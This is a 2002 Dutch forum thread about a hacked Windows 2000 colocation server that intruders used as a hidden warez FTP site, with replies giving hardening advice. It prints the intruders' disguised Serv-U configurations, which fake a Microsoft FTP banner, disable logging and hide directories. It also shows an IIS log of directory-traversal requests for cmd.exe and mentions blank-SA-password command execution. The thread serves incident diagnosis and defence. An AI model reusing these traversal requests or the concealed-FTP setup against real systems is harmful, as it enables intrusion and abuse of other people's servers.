Absolute aanrader van Microsoft:
http://www.microsoft.com/.../tools/Tools/MBSAhome.asp
Microsoft Baseline Security Analyser controleert de diverse exploits en geeft aan waar je machine mogelijk niet goed beveiligd is. Had voor de topicstarter veel ellende kunnen schelen.

donderdag 24 oktober 2002 18:54

Acties:
  • 0 Henk 'm!

Verwijderd

Gefeliciteerd, IIS (wat zo lek als een mandje is) is gehacked en je server gebruikt als pubstro voor een FXP board hoogst waarschijnlijk. Dat timer.exe is echt geen windows time programma. De werkelijke functie er van laat zich moeilijk raden.

De tips om te formatteren en opnieuw te installeren zijn echt de dom en nutteloos.

donderdag 24 oktober 2002 21:01

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Verwijderd schreef op 24 oktober 2002 @ 18:54:
Gefeliciteerd, IIS (wat zo lek als een mandje is) is gehacked en je server gebruikt als pubstro voor een FXP board hoogst waarschijnlijk. Dat timer.exe is echt geen windows time programma. De werkelijke functie er van laat zich moeilijk raden.

De tips om te formatteren en opnieuw te installeren zijn echt de dom en nutteloos.
En wat is jouw bijdrage aan de discussie precies :?

drs. Kama

donderdag 24 oktober 2002 21:08

Acties:
  • 0 Henk 'm!
  • aReaRe
  • Registratie: Juli 2001
  • Niet online

aReaRe

Welkom Patrick (11-02-2022) <3

RobStop stop je offtopic replies :)

Zie ook deze: - Onzinnige replies

Renault Mégane Estate 1.3 TCe EDC (IV) 140pk Bose (oktober 2019) met aan de trekhaak een Caravelair Antares Titanium 390 (mei 2021)

donderdag 24 oktober 2002 21:57

Acties:
  • 0 Henk 'm!
  • blackd
  • Registratie: Februari 2001
  • Niet online

blackd

[nohtml]
Verwijderd schreef op 24 oktober 2002 @ 18:54:
Gefeliciteerd, IIS (wat zo lek als een mandje is) is gehacked en je server gebruikt als pubstro voor een FXP board hoogst waarschijnlijk.
Ow, maar dat wisten we toch al?
De tips om te formatteren en opnieuw te installeren zijn echt de dom en nutteloos.
En waarom :?

9000Wp o/w SolarEdge SE6K - Panasonic 5kW bi-bloc - gasloos sinds 17-7-2023

donderdag 24 oktober 2002 22:23

Acties:
  • 0 Henk 'm!

Verwijderd

uhm, dit lijkt me duidelijk het gevolg van iemand die je die ftpserver heeft toegestuurd, en of een paardje dus. Hiertegen werkt alleen een vuurmuur en dan het liefst een hardwarematige in de vorm van een roeter, plus dat je zelf altijd, blijft, opletten wat je pakt van internet en wat je accepteerd van anderen, en dus niet alleen via je email, maar ook via ICQ of MSN. Weetwel dat je je vuurmuur goed moet kunnen configureren. Zonealarm lijkt mooi, maar als men eenmaal binnen is via zo'n paardje, en je let ff niet op, dan kun je zo'n softwarematige vuurmuur makkelijk omzeilen. Zoek maar eens op hackersforums naar methoden om vuurmuurtjes te omzeilen. Het is zowiso verstandig van dergelijke methoden op de hoogte te blijven opdat je zelf concreete maatregelen kunt treffen inplaats van te wachten op Microsoft totdat hij een keer een update released! En hou je systeem up-to-date. Je sprak dat je je Microsoft progies niet meer wou updaten omdat het je al genoeg heeft gekost aan licenties. Dit vat ik niet helemaal want alle updates zijn free bij Microsoft. En als je dan toch zou moeten dokken voor andere non-Microsoft-progies dan had je nu niet hoeven dokken bij je ISP. Waan je nooit veilig! Zonder fouten geen vooruitgang! Als je een server draait dan moet je altijd weten aan welke gevaren je eventueel bloot staat. Een systeembeheerder is daarom ook nooit uitgeleerd, helaas en gelukkig, hehehe. Suc6 met deze tips

P.S.: Check eens op de site van Microsoft of je deze tool eens kunt vinden: "Microsoft Baseline Security Analyzer" . Een goede tool om je basis beveiliging te controlleren.

Ik heb je post wat lopen aanpassen. Zie ook Windows Operated Systems - Policy#ms. Ik was van plan een paar stukjes die al eerder waren weerlegd weg te laten maar dat is censuur :)

[ Voor 0% gewijzigd door F_J_K op 25-10-2002 00:15 ]

donderdag 24 oktober 2002 22:29

Acties:
  • 0 Henk 'm!

Verwijderd

Sorry voor het niet-helemaal-lezen-van-deze-topic. Weerdo was me al voor met het: Microsoft Baseline Security Analyzer-tooltje :( :p

donderdag 24 oktober 2002 22:39

Acties:
  • 0 Henk 'm!

Verwijderd

voilà

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115

[GLOBAL]
Version=4.0.0.4
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASgAABD7jYzwQJwEQB1BhdHJpY2sER2Vlbg==
PacketTimeOut=300

[EXTERNAL]
EventHookDLL1=JAsfv.dll

[DOMAINS]
Domain1=0.0.0.0||20000|FTP|1|0

[Domain1]
SignOff=c:\winnt\tasks\desktop\timer.txt
DirChangeMesFile=c:\winnt\tasks\desktop\timer.txt
URLDecode=1
MDTMCanChange=0
ReplyHello=Microsoft FTP Service 5.0
ReplyHelp=...
ReplyNoAnon=...
ReplyNoCredit=...
ReplySYST=Happy leech 
ReplyTooMany=Server Full, Don't hammer...will be logged
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
LogFileSystemMes=0
LogFileSecurityMes=0
LogFileGETs=0
LogFilePUTs=0

User1=Admin|1|0
User2=anno|0|0
User3=TVRIPZ|0|0
User4=leeg|0|0
User5=Gamez|1|0
User6=Mp3|0|0
User7=MovieZ|0|0
User8=ConsolE|0|0

[USER=Admin|1]
Password=ck715C530DDDC3B8F1135C680B2F45A3C0
HomeDir=c:\
LoginMesFile=c:\winnt\tasks\desktop\timer.txt
AlwaysAllowLogin=1
Maintenance=System
Access1=\|RWAMELCDP
[USER=ConsolE|1]
Password=su9EE2C6FAF4F5EB819B1D04845465DB1A
HomeDir=e:\system volume information\tracking\07                          #@#       console       #@#
Enable=0
RelPaths=1
MaxUsersLoginPerIP=1
SpeedLimitDown=256000
TimeOut=120
MaxNrUsers=5
Access1=e:\System Volume Information\tracking\07                          #@#       ConSole       #@#|RLP
[USER=Mp3|1]
Password=hc16E838A41CA3CC4D84E7C330310A9D06
HomeDir=e:\system volume information\tracking\06                          #@#          mp3          #@#
Enable=0
RelPaths=1
MaxUsersLoginPerIP=1
SpeedLimitDown=256000
TimeOut=120
MaxNrUsers=5
Access1=e:\System Volume Information\tracking\06                          #@#          Mp3          #@#|RLP
[USER=TVRIPZ|1]
Password=tv1E9E6E0321B4471A1020AE86E410FB8D
HomeDir=e:\system volume information\tracking\06                          #@#       tv-ripz        #@#
Enable=0
RelPaths=1
MaxUsersLoginPerIP=1
SpeedLimitDown=256000
TimeOut=120
MaxNrUsers=4
Access1=e:\System Volume Information\tracking\06                          #@#       Tv-RipZ        #@#|RLP
[USER=Gamez|1]
Password=dl259991ECF6103E0838F8CBFF5982FF05
HomeDir=e:\system volume information\tracking\06                          #@#        gamez       #@#
RelPaths=1
MaxUsersLoginPerIP=1
SpeedLimitDown=204800
TimeOut=60
MaxNrUsers=20
IPAccess1=D|213.224.60.122
IPAccess2=A|*.*.*.*
Access1=e:\System Volume Information\tracking\06                          #@#        GaMeZ       #@#|RLP
[USER=MovieZ|1]
Password=vzB46D3ED601EB07D1A78966F6FA53E1EB
HomeDir=e:\system volume information\tracking\06                          #@#       moviez        #@#
Enable=0
RelPaths=1
MaxUsersLoginPerIP=1
SpeedLimitDown=5120
TimeOut=120
MaxNrUsers=3
Access1=e:\System Volume Information\tracking\06                          #@#       MoVieZ        #@#|RLP
[USER=leeg|1]
Password=np4CC45A5C3CAA5AEC3361C0F8245836E9
HomeDir=e:\system volume information\tracking
Enable=0
RelPaths=1
TimeOut=600
Access1=e:\system volume information\tracking|RWAMLCDP
[USER=anno|1]
Password=cp4736DEAA1D5B16AB7D4E67006D29567A
HomeDir=e:\system volume information\tracking
LoginMesFile=c:\winnt\tasks\desktop\timer.txt
Enable=0
RelPaths=1
MaxUsersLoginPerIP=2
TimeOut=600
MaxNrUsers=15
Access1=e:\System Volume Information\tracking|RWAMLCDP

donderdag 24 oktober 2002 23:01

Acties:
  • 0 Henk 'm!

Verwijderd

Beter save than sorry. Dit is een goede guide om je server dicht te timmeren: http://www.nsa.gov/snac/index.html
Hier staat ook als advies om systeem bestanden als cmd.exe ftp.exe enzo te hernoemen, verplaatsen, auditten. Als je deze guide aanhoudt ben je al veilig voor een aantal leaks die nog moeten worden gevonden.
Voorbeeld: Haal alle mappings weg in IIS die je niet gebruikt. Gevolg: geen NIMDA en CODE red. Puur omdat die mappings niet bestaan. (oke tegenwoordig doet de lockdown tool dat voor je "vroeger" moest je dat met de hand doen)

vrijdag 25 oktober 2002 00:18

Acties:
  • 0 Henk 'm!
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Verwijderd schreef op 24 oktober 2002 @ 12:49:
Ik heb weleens meegemaakt dat de eigenaar van de machine niet eens meer kon inloggen. De administrator was gerenamed en van een ander password voorzien...
Daarom wordt ook aangeraden in de NSA guides om iig je Administrator account te renamen en een reserve-admin account te maken met een " inconspicuous name".

Zo heb je zelf wellicht nog een backdoor om eventuele schade te herstellen.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

vrijdag 25 oktober 2002 00:32

Acties:
  • 0 Henk 'm!
  • markvt
  • Registratie: Maart 2001
  • Laatst online: 21:42

markvt

Peppi Cola

geen cdir.txt op je pc ?
DirChangeMesFile=c:\winnt\tasks\desktop\timer.txt
is dat de ene in die zipfile?
zo kan ik niet zien welke fxp-groep het was

van-tilburg.info -=- meka (sega emulator) - Proud MEDION fanclub member - KOPPIG VOLHOUDEN !

vrijdag 25 oktober 2002 01:33

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Verwijderd schreef op 24 oktober 2002 @ 22:39:
voilà

code:
1
2
3
4
5

[GLOBAL]
Version=4.0.0.4
..
MaxNrUsers=15
Access1=e:\System Volume Information\tracking|RWAMLCDP
Ehm... ja?

Overigens: Het gaat hier om een colo server... Dus ik doe er niks mee behalven serven. Niet MSN, niet ICQ, ofzo... Ik ben druk met de laatste SQL patches.

Ik gebruik zelf altijd een ander account dan Administrator, maar dit andere account is gewoon member van de security group Administrators... Is dat voldoende?

drs. Kama

vrijdag 25 oktober 2002 08:15

Acties:
  • 0 Henk 'm!

Verwijderd

BackSlash32 schreef op 25 oktober 2002 @ 00:18:
[...]

Daarom wordt ook aangeraden in de NSA guides om iig je Administrator account te renamen en een reserve-admin account te maken met een " inconspicuous name".

Zo heb je zelf wellicht nog een backdoor om eventuele schade te herstellen.
In het bovengenoemde geval waren alle accounts muv administrator, guest en iusr_machinenaam gewist.

Verder was de guest gedisabled, en en de administrator gerenamed.

Eea. was het gevolg van een met Nimda besmette machine die vervolgens door iemand ge-owned werd.

vrijdag 25 oktober 2002 11:30

Acties:
  • 0 Henk 'm!
  • twiekert
  • Registratie: Februari 2001
  • Laatst online: 30-08 11:55

twiekert

aahh de ftpuserv.ini oid komt mij angstig bekend voor. woensdag middag is namelijk precies hetzelfde gebeurd op een win2k prof doos bij mij op het werk. de service Serv-U ftp server was geinstalleerd naar c:\winnt\system32\winmgnt.exe. gelukkig was ik er snel bij, en was er 'slechts' 4 gig aan traffic getrokken.

Bij een zoek opdracht op de schijf naar ftp files en rar bestanden kwam er 3.6gig aan warez naar boven. alle security patches waren op dit systeem geinstalleerd, het enige wat waarschijnlijk remote exploitable was, was de MS sql 7.0 server, vraag me niet wat die op dat systeem deed :? |:(

de methode zoals de topicstarter heeft ondervonden was precies hetzelfde dus. geinstalleerde service met link naar een gelijknamige windows service. in dit geval dus winmgnt.exe en niet winMgnt.exe.

Nu vraag ik mij dus af hoe dit heeft kunnen gebeuren. netbios e.d. is zoiezo niet mogelijk, wordt tegengehouden door de router, ntp zit ook dicht.

/edit

de upload directory's waren ook aardig verstopt

c:\drivers\via\inf\win95

en c:\winnt\security\setup\

voor de geinteresseerden zal ik vanmiddag nog ff de serv-u config bestanden en de welcome inlog.txt laten zien :P. de ftp server draaide trouwens op poort 22 en poort 5000
markvt schreef op 25 oktober 2002 @ 00:32:
geen cdir.txt op je pc ?
DirChangeMesFile=c:\winnt\tasks\desktop\timer.txt
is dat de ene in die zipfile?
zo kan ik niet zien welke fxp-groep het was
die heb ik wel voor je. :)

RtB warez ofzo.. :?

vrijdag 25 oktober 2002 11:51

Acties:
  • 0 Henk 'm!

Verwijderd

twiekert schreef op 25 oktober 2002 @ 11:30:

lang verhaal over ook een machine die ge-exploit is.
En hier is wederom aangetoond dat het patchen en juist instellen van de beveiliging o zo belangrijk is. Je kunt een machine niet zomaar aan internet hangen en hopen dat'ie het lang blijft doen.

Ik heb thuis een webserver draaien (ja ja, gewoon IIS 5.1 van Windows XP), en als je de logfiles bekijkt is er elke dag wel een of meerdere hack-poging te zien. Hier worden gewoon known-exploits gebruikt. Er zijn virussen die dit doen, Nimda en CodeRed zijn hier voorbeelden van.

Voorbeeldje:


06:05:20 194.26.186.18 GET /pics/defy.gif 200
06:05:49 212.142.35.13 GET /pics/defy.gif 200
06:09:36 62.46.106.34 GET /scripts/root.exe 404
06:09:37 62.46.106.34 GET /MSADC/root.exe 404
06:09:37 62.46.106.34 GET /c/winnt/system32/cmd.exe 404
06:09:39 62.46.106.34 GET /d/winnt/system32/cmd.exe 404
06:09:39 62.46.106.34 GET /scripts/..%5c../winnt/system32/cmd.exe 404
06:09:40 62.46.106.34 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
06:09:40 62.46.106.34 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
06:09:42 62.46.106.34 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 404
06:09:42 62.46.106.34 GET /scripts/..Á../winnt/system32/cmd.exe 404
06:09:43 62.46.106.34 GET /scripts/winnt/system32/cmd.exe 404
06:09:43 62.46.106.34 GET /winnt/system32/cmd.exe 404
06:09:44 62.46.106.34 GET /winnt/system32/cmd.exe 404
06:09:44 62.46.106.34 GET /scripts/..%5c../winnt/system32/cmd.exe 404
06:09:46 62.46.106.34 GET /scripts/..%5c../winnt/system32/cmd.exe 404
06:09:46 62.46.106.34 GET /scripts/..%5c../winnt/system32/cmd.exe 404
06:09:47 62.46.106.34 GET /scripts/..%2f../winnt/system32/cmd.exe 404
06:20:04 62.194.136.233 GET /pics/defy.gif 200
06:21:35 217.120.11.15 GET /pics/defy.gif 304
06:29:27 62.131.135.11 GET /pics/defy.gif 200
06:36:54 194.109.223.132 GET /pics/defy.gif 200
06:37:57 212.187.87.31 GET /pics/defy.gif 200


het enige wat er te vinden is, is een simpele (platte) homepage (index.html), en een directory met plaatjes enz (defy.gif is mijn icoontje), dus al die GET's naar /scripts en /winnt zijn exploit-attemps...

[ Voor 0% gewijzigd door Verwijderd op 25-10-2002 14:35 . Reden: tiepvout ]

zondag 27 oktober 2002 14:26

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Verwijderd schreef op 25 oktober 2002 @ 11:51:
[...]


En hier is wederom aangetoond dat het patchen en juist instellen van de beveiliging o zo belangrijk is. Je kunt een machine niet zomaar aan internet hangen en hopen dat'ie het lang blijft doen.
Dit apparaat zit al ruim 3 jaar online in een dataruimte en niet "zomaar" aan de kabel hangen. Dit is ook pas de eerste keer in al die tijd dat er wat gebeurt (op een exchange-relay exploit na een upgrade na). Standaard zaken als Nimda en CodeRed zijn ook allang gepatched (het is niet een server met maar 1000 hits per dag ofzo).

Overigens heb ik nu dus alle patches erop zitten en het service pack geinstalleerd.
Vanochtend is men echter er wederom in geslaagd om erin te komen. Gelukkig laat ik m'n netwerkmonitor een aantal mensen mailen bij excessief verkeer, dus kon ik het in de kiem smoren (men was halverwege CD2 van het eerste spel :p). Ik heb weer wat dingen dichtgezet, en m'n Tasks folder read only gemaakt. Verder waren ftp.exe en tftp.exe weer terug, maar ik weet niet zeker of ik ze gekopieerd heb naar een nieuw naam en daarna het origineel ben vergeten te deleten, of dat ze de originelen er weer op hebben weten te zetten.

Verder lijkt het erop dat ISA Server alleen effect heeft op clients *achter* de server. Maw, ik heb er niets aan op de server. Toch es gaan kijken naar wat degelijkers.

Ik ben nog aan het timmeren op SQL. Het schijnt dat via een exploit in SQL ook systeemopdrachten uitgevoerd kunnen worden. Er blijft niet veel meer over dan dat. Overigens is het installeren van een SQL service pack een hel :( Maar ik blijf bezig.

drs. Kama

zondag 27 oktober 2002 15:14

Acties:
  • 0 Henk 'm!
  • Redje
  • Registratie: Juli 2000
  • Laatst online: 05-01 15:49

Redje

Ik had zelf thuis ook ISA draaien en op m'n werk draaien we als test ook ISA.
Buiten het feit dat ik het persoonlijk geen echte firewall vind, blocked deze wel degelijk al het traffic van internet naar de server en vanaf de server naar het internet. Mits je natuurlijk alles goed hebt ingesteld.
Waarschijnlijk was dit dus niet het geval want anders zou er nooit een connectie van en naar poort 20000 kunnen plaatsvinden, ook als was de server gehacked.

Dus opzich is ISA best degelijk hoor :)

zondag 27 oktober 2002 16:22

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Nou dat het niet helemaal dicht zat dat weet ik inmiddels. Ik ben er voorzichtig wat mee gaan doen, maar ik niet veel meer dan clientinstellingen vinden.

Waarom vind je het geen echte firewall?

drs. Kama

zondag 27 oktober 2002 21:51

Acties:
  • 0 Henk 'm!

Verwijderd

Wat mij nou verbaast, is dat je server in korte tijd voor de tweede keer ge-exploit is. Uit voorzorg zou ik hem helemaal schoonvegen en opnieuw inrichten, en dus niet alleen de verdachte spullen eraf halen. Best kans dat je iets over het hoofd ziet.

Vervolgens in een gesloten lannetje hangen en met een poortscanner vanaf een andere machine kijken welke poorten er nog open staan. Kijk welke poorten er voor je website uberhaupt nodig zijn (poort 80 en/of 443, wellicht poort 21 om updates te kunnen uploaden), en zet de rest dicht. Op zijn minst door gebruik te maken van TPC/IP filtering van Windows 2000. Uiteraard "Client for Microsoft Networks" en "File and Printersharing" uitvinken.

Bij voorkeur plaats je je webserver achter een firewall die uitsluitend het verkeer voor de benodigde poorten doorlaat, en de rest "dropt". Het liefst een NAT firewall, zodat het werkelijke IP-adres van je webserver niet eens bekend is. Zodoende kunnen SQL-exploits in ieder geval nooit benut worden.

Een van de belangrijkste regels in beveiliging is dat de poorten waar je niet bij mag komen, gewoon niet zichtbaar zijn. Daarbij kan een firewall je helpen, ook ISA server. Al betwijfelen sommige mensen of dat wel een handige keuze is, een firewall op een OS dat nou niet echt een grote reputatie heeft op het gebied van veiligheid. Maar echt slecht is het niet als je het mij vraagt. Default staat een ISA server in ieder geval "dicht", en da's al heel wat. Het valt of staat zowiezo met de configuratie van je firewall.

Wat ik hierboven schrijf is misschien een open deur, maar volgens mij is dit hele topic een grote open deur.

Er zijn uiteraard op internet aardig wat firewalling-howto's te vinden. Een goed startpunt is ISA server.org (als je met ISA server aan de wilt dan).

PS: En als je op afstand bij je server wilt moet je poort 3389 doormappen vanaf je firewall naar je webserver, dus dat is zeker te doen.

zondag 27 oktober 2002 22:25

Acties:
  • 0 Henk 'm!

Verwijderd

Als je de server alleen maar gebruikt om een website(je) te hosten en verder de disk ruimte niet gebruikt dan kun je toch net zo goed de partitions kleiner maken zodat warez uploaden niet meer kan ?

Dan heb je iig niet meer zo veel netwerk verkeer als je gehacked word.

maandag 28 oktober 2002 00:20

Acties:
  • 0 Henk 'm!
  • DJSmiley
  • Registratie: Mei 2000
  • Laatst online: 22:59

DJSmiley

Verwijderd schreef op 27 oktober 2002 @ 22:25:
Als je de server alleen maar gebruikt om een website(je) te hosten en verder de disk ruimte niet gebruikt dan kun je toch net zo goed de partitions kleiner maken zodat warez uploaden niet meer kan ?

Dan heb je iig niet meer zo veel netwerk verkeer als je gehacked word.
Een pubstro wordt heus wel op de partitie gemaakt met de meest vrije ruimte ;)

En daarnaast.. voorkomen is beter dan genezen

maandag 28 oktober 2002 08:41

Acties:
  • 0 Henk 'm!

Verwijderd

DJSmiley schreef op 28 oktober 2002 @ 00:20:
[...]


Een pubstro wordt heus wel op de partitie gemaakt met de meest vrije ruimte ;)

En daarnaast.. voorkomen is beter dan genezen
Ik doelde er op om geen lege ruimte over te laten... dus geen partitie aanmaken voor de ruimte die je toch niet geruikt.

Beetje zonde van je HD magoed...

maandag 28 oktober 2002 11:40

Acties:
  • 0 Henk 'm!
  • lavagiant
  • Registratie: April 2002
  • Laatst online: 23-03-2018

lavagiant

...

Ik zou idd beginnen met het formatteren van je server. Kost ff tijd, maar ben je zeker van een schone server om weer mee te beginnen. Als je zoveel hits hebt per dag dan verdien je er vast veel geld mee en is het dus ook niet zo'n heel groot probleem wat je aan je ISP moet betalen.

maandag 28 oktober 2002 13:24

Acties:
  • 0 Henk 'm!
  • Matthijs Hoekstra
  • Registratie: Januari 2001
  • Laatst online: 16:06

Matthijs Hoekstra

KaMiKaZe schreef op 23 oktober 2002 @ 23:16:
Ik begrijp niet dat providers niet automatisch een stop zetten op een server als blijkt dat er zoveel data over een lijn heen flopt dat het onmogelijk van een website kan komen.
dat zou een hoop ellende besparen.
Hoezo? Misschien wilde de topic starten wel al die porno beschikbaar stellen (theoretisch dan), kan de ISP toch niet ruiken. Dat ze contact zoeken is heel netjes, automatisch afsluiten is uit den boze.

maandag 28 oktober 2002 13:29

Acties:
  • 0 Henk 'm!

Verwijderd

Als je SQL-server installeerd dan is het SA password standaard blanco. Er zijn natuurlijk scanners om SQL-servers te vinden die een blanco SA password hebben. Heb je er een gevonden dan kan je met standaard stored procedures DOS commando's geven. Je hebt dan system privileges (meen ik). Makkelijke manier dus om een server te "hacken"
Zorg er dus voor dat er een sterk SA password op je bak staat, en sluit poort 1433 naar het internet af (als dat mogelijk is natuurlijk)

maandag 28 oktober 2002 13:47

Acties:
  • 0 Henk 'm!
  • AMDFreak
  • Registratie: Juni 2001
  • Laatst online: 12-09 09:20

AMDFreak

Intel is zo..

neem maar eens even contact op met mij.. :)

* AMDFreak heeft wel leuke scanners want ik scan namelijk ook op sql, netbios en iis :) dus ik kan zo zien of je server wel/niet goed gepatched is :)
Je moet het zelf weten hoor, als je me niet vertrouwd oid, dan doe je het niet ;)

9x Jinko 420Wp = 3780wp - Zuid 35

maandag 28 oktober 2002 13:58

Acties:
  • 0 Henk 'm!

Verwijderd

Leuk aangeboden, maar dat kan de topicstarter natuurlijk zelf ook.

En het zien of je server toerijkend gepatched lukt je echt niet met GFI Languard Network Security Scanner of iets dergelijks. Immers, als er een x aantal poorten dicht staan, dan zie je niet genoeg om te kunnen bepalen of een machine op het juiste patchlevel is.

maandag 28 oktober 2002 14:13

Acties:
  • 0 Henk 'm!

Verwijderd

Als het alleen om de patches gaat heeft microsft natuurlijk de "Microsoft Baseline Security Analyzer" Een van de weinige gratis producten van microsoft.
Verder zijn er online ook wel een aantal poort- en security scanners.

maandag 28 oktober 2002 14:28

Acties:
  • 0 Henk 'm!
  • Drogo
  • Registratie: Augustus 1999
  • Laatst online: 14-09 00:12

Drogo

Topicstarter heeft zo te zien genoeg verstand van dit soort dingen. Daarom begrijp ik niet waarom je zelf niet de MS-mailinglists opgezocht hebt, en waarom je het MS update programma niet op de achtergrond laat draaien. Helemaal als je een legale versie van W2k hebt zie ik niet in wat dit zeer handige proggie voor kwaad kan doen.

maandag 28 oktober 2002 15:16

Acties:
  • 0 Henk 'm!
  • hilgo
  • Registratie: Maart 2000
  • Laatst online: 12-09 15:40

hilgo

Clear your mind of can't.

AMDFreak schreef op 28 oktober 2002 @ 13:47:
neem maar eens even contact op met mij.. :)

* AMDFreak heeft wel leuke scanners want ik scan namelijk ook op sql, netbios en iis :) dus ik kan zo zien of je server wel/niet goed gepatched is :)
Je moet het zelf weten hoor, als je me niet vertrouwd oid, dan doe je het niet ;)
Hmmm... ik hoop dat je isp het niet merkt, die zijn er niet zo blij mee denk ik. Geloof zelfs dat het strafbaar is, dat scannen (me eens laten wijsmaken, weet niet of het waar is) ??

Discogs

dinsdag 29 oktober 2002 10:25

Acties:
  • 0 Henk 'm!
  • Rusty
  • Registratie: Juni 1999
  • Laatst online: 09-09 13:25

Rusty

Als je inderdaad via SQL gehackt bent moet je even snel kijken of je sa password gewijzigd is. Dat is een standaard user die Admin rechten heeft. Alleen het password is vaak leeg (standaard install.)

Een andere manier om via SQL te hacken is SQL injection. Dit is veel lastiger en ook lastiger te voorkomen. Er wordt hier namelijk gebruik gemaakt van fouten in je pagina's en SQL setup.

Als je meer wilt weten heb ik nog wel wat leuke sites die het 1 en ander uitleggen.

3 x Marstek Venus 5.12KW V151. CT003 V114 en HW P1

dinsdag 29 oktober 2002 10:45

Acties:
  • 0 Henk 'm!
  • scorpie
  • Registratie: Augustus 2001
  • Laatst online: 16:27

scorpie

Supra Addict

hilgo schreef op 28 oktober 2002 @ 15:16:
[...]


Hmmm... ik hoop dat je isp het niet merkt, die zijn er niet zo blij mee denk ik. Geloof zelfs dat het strafbaar is, dat scannen (me eens laten wijsmaken, weet niet of het waar is) ??
Scannen is niet strafbaar indien men de uitdrukkelijke toestemming van de persoon heeft gehad, die gescanned wilt worden.

wil een Toyota Supra mkIV!!!!! | wil een Yamaha YZF-R{1,6} | wil stiekem ook een Ducati
"Security is just a state of mind"
PSN: scorpie | Diablo 3: scorpie#2470

dinsdag 29 oktober 2002 10:50

Acties:
  • 0 Henk 'm!
  • Vidra
  • Registratie: Juli 2000
  • Laatst online: 13-09 15:56

Vidra

Vragen?

Verwijderd schreef op 24 oktober 2002 @ 18:54:
Gefeliciteerd, IIS (wat zo lek als een mandje is) is gehacked en je server gebruikt als pubstro voor een FXP board hoogst waarschijnlijk. Dat timer.exe is echt geen windows time programma. De werkelijke functie er van laat zich moeilijk raden.

De tips om te formatteren en opnieuw te installeren zijn echt de dom en nutteloos.
De werkelijke functie van timer.exe is niet zo moeilijk gewoon de exe openen in een debugger of notepad...

Timer.exe is hetzelfde als serv-u.exe hij is alleen gerenamed zodat hij niet opvalt bij het checken van de processen. :)

serv-u *.ini
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

[GLOBAL]
Version=3.0.0.16
EncryptPasswords=0
PacketTimeOut=180
LocalSetupPassword=542F53475D0459
LocalSetupPortNo=1234
SocketKeepAlive=1
SocketNoNagle=1
DirCacheEnable=0
BlockAntiTimeOut=1
RegistrationKey=6dYwuCzKYyiSYQm0Hlp0OmDivgW8pyxAM2ZMLSpgg9Ywu+psehNIYwi0Ex4bTweO33ac5V4vRxJZXk8MhblFzGyrF1z1DWbWfzZaVAWW
MaxNrUsers=10
OpenFilesUploadMode=Shared
OpenFilesDownloadMode=Exclusive
ProcessID=392
AntiHammer=1
AntiHammerBlock=600



[USER=martin|2]
Password=dinsdag29102002
HomeDir=C:\windows\system32\temp\setup\play\movies\
RelPaths=1
HideHidden=1
MaxUsersLoginPerIP=1
TimeOut=600
MaxNrUsers=10
IPAccess1=A|*
Access1=C:\windows\system32\temp\setup\play\movies\|RLP

[USER=admin|2]
Password=admin29102002
HomeDir=C:\
RelPaths=0
AlwaysAllowLogin=1
TimeOut=600
Maintenance=System
Note1="Wizard generated account"
Access1=C:\|RWAMLCDP
[DOMAINS]
[Domain1]
MaxNrUsers=10
User1=leech|1|0
Group1=lala

[USER=leech|1]
Password=leech and leech
HomeDir=f:\ftp server
HideHidden=1
MaxUsersLoginPerIP=1
TimeOut=60
MaxNrUsers=10
Access1=F:\FTP server|RLP


timer.ini
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

[GLOBAL]
Version=4.0.0.4
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASgAABD7jYzwQJwEQB1BhdHJpY2sER2Vlbg==
PacketTimeOut=300

[EXTERNAL]
EventHookDLL1=JAsfv.dll

[DOMAINS]
Domain1=0.0.0.0||20000|FTP|1|0

[Domain1]
SignOff=c:\winnt\tasks\desktop\timer.txt
DirChangeMesFile=c:\winnt\tasks\desktop\timer.txt
URLDecode=1
MDTMCanChange=0
ReplyHello=Microsoft FTP Service 5.0
ReplyHelp=...
ReplyNoAnon=...
ReplyNoCredit=...
ReplySYST=Happy leech 
ReplyTooMany=Server Full, Don't hammer...will be logged
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
LogFileSystemMes=0
LogFileSecurityMes=0
LogFileGETs=0
LogFilePUTs=0

User1=Admin|1|0
User2=anno|0|0
User3=TVRIPZ|0|0
User4=leeg|0|0
User5=Gamez|1|0
User6=Mp3|0|0
User7=MovieZ|0|0
User8=ConsolE|0|0


Ingevoerde texten...zijn uiteraard bedacht als voorbeeld :)

Executive Director | aan mijn uitspraken kunnen geen rechten worden ontleend! | Build: AMD 7800X3D - 32GB - AMD RX 7900XTX

dinsdag 29 oktober 2002 19:25

Acties:
  • 0 Henk 'm!
  • lavagiant
  • Registratie: April 2002
  • Laatst online: 23-03-2018

lavagiant

...

Vandaag nog last gehad van aanvallen of zijn ze er inmiddels mee gestopt?

woensdag 30 oktober 2002 02:49

Acties:
